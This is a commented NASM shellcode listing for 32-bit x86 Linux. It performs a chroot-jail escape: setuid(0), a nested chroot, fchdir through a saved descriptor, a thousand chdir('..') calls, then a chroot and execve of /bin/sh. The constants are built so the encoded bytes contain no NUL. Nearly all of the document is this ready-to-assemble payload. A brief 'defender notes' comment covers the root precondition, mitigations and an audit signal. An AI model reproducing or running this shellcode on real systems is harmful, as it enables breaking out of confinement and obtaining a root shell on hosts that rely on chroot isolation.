- ;// Target: 32-bit x86 Linux, NASM syntax, legacy int 80h syscall ABI
- ;// (eax = syscall number, ebx/ecx/edx = arguments, result returned in eax).
- ;// Syscall sequence performed by this listing:
- ;//   setuid32(0) -> mkdir(".out", 0755) -> open(".", O_RDONLY) -> chroot(".out")
- ;//   -> fchdir(saved fd) -> close(fd) -> chdir("..") x1000 -> chroot(".")
- ;//   -> execve("//bin/sh") -> exit(0) if execve returns.
- ;// The fd opened before the first chroot still refers to a directory outside
- ;// the new root; the later fchdir depends on that.
- ;// Defender notes: chroot(2) requires CAP_SYS_CHROOT, so this sequence depends on
- ;// the process being root (or holding that capability) inside the jail. Dropping
- ;// privileges after entering a chroot, or confining with pivot_root plus a mount
- ;// namespace instead of chroot alone, removes that precondition. A chroot call
- ;// followed by fchdir and a burst of chdir("..") from one process is a useful
- ;// audit signal.
- ;// No syscall return value is checked anywhere in this listing.
- ;// NOTE(review): constants are built through al/ax/cx writes and pushes, presumably
- ;// to keep NUL bytes out of the encoded instructions - confirm against the assembled bytes.
- global _start
- _start:
- ;// Zero the four working registers; later 8/16-bit writes rely on the upper bits being 0.
- xor eax, eax
- xor ebx, ebx
- xor ecx, ecx
- xor edx, edx
- mov al, 213 ;// i386 syscall 213 = setuid32
- ;// EBX is 0 for setuid(0)
- int 80h
- ;// mkdir(".out", 0755)
- xor eax, eax
- mov al, 39 ;// Syscall for MKDIR
- push ecx ;// push 0 (ECX is still zero) as the NUL terminator
- push 0x74756f2e ;// ".out" in reverse
- mov ebx, esp ;// pointer to ".out" folder string
- mov cx, 755o ;// rwxr-xr-x
- int 80h
- ;// open(".", O_RDONLY): keep a descriptor on the current directory
- xor eax, eax
- xor ecx, ecx ;// O_RDONLY (000000000)
- mov al, 0x2e ;// AL = '.' (0x2e), so EAX = 0x0000002e
- push eax ;// little-endian: memory holds "." followed by three NUL bytes
- mov ebx, esp ;// Set EBX to the string pointer
- mov al, 5 ;// Syscall for open
- int 80h
- mov esi, eax ;// Move File Descriptor into ESI for later
- ;// chroot(".out")
- xor eax, eax
- push ecx ;// push 0 (ECX was zeroed above) as the NUL terminator
- push 0x74756f2e ;// ".out" in reverse
- mov ebx, esp ;// pointer to ".out" folder string
- mov al, 61 ;// Syscall for CHROOT
- int 80h
- ;// fchdir(fd): the descriptor is the one opened on "." above, not on ".out"
- xor eax, eax
- mov ebx, esi ;// move the saved "." FD into EBX
- mov al, 133 ;// Syscall for FCHDIR
- int 80h
- ;// close(fd)
- xor eax, eax
- mov al, 6 ;// Syscall for CLOSE
- mov ebx, esi
- int 80h
- ;// Build the string ".." on the stack and call chdir("..") in a counted loop
- xor eax, eax
- mov ax, 0x2e2e ;// EAX = 0x00002e2e, i.e. ".." plus two NUL bytes once pushed
- push eax
- mov ebx, esp ;// EBX -> ".."
- mov cx, 1000 ;// loop 1000 times
- loop1: xor eax, eax
- mov al, 12 ;// Syscall for CHDIR
- int 80h
- dec ecx
- jnz loop1
- ;// chroot("."): ECX is 0 when the loop exits, so the CL write yields 0x0000002e
- mov cl, 0x2e ;// Set ECX to "."
- push ecx ;// Push "." onto stack
- mov ebx, esp ;// Pointer to the "." string (not ".out")
- mov al, 61 ;// Syscall for CHROOT
- int 80h
- ;// execve("//bin/sh", argv, envp)
- xor eax, eax
- push eax ;// NUL terminator for the path string
- push 0x68732f6e ;// "n/sh" in reverse
- push 0x69622f2f ;// "//bi" in reverse
- mov ebx, esp ;// EBX -> "//bin/sh"
- push eax ;// NULL word
- mov edx, esp ;// EDX = envp, pointing at that NULL word
- push ebx ;// argv[0] = pointer to the path
- mov ecx, esp ;// ECX = argv = { path, NULL }
- mov al, 11 ;// Syscall for EXECVE
- int 80h
- ;// Reached only if execve returns: exit(0)
- xor eax, eax
- xor ebx, ebx
- mov al, 1 ;// Syscall for EXIT
- int 80h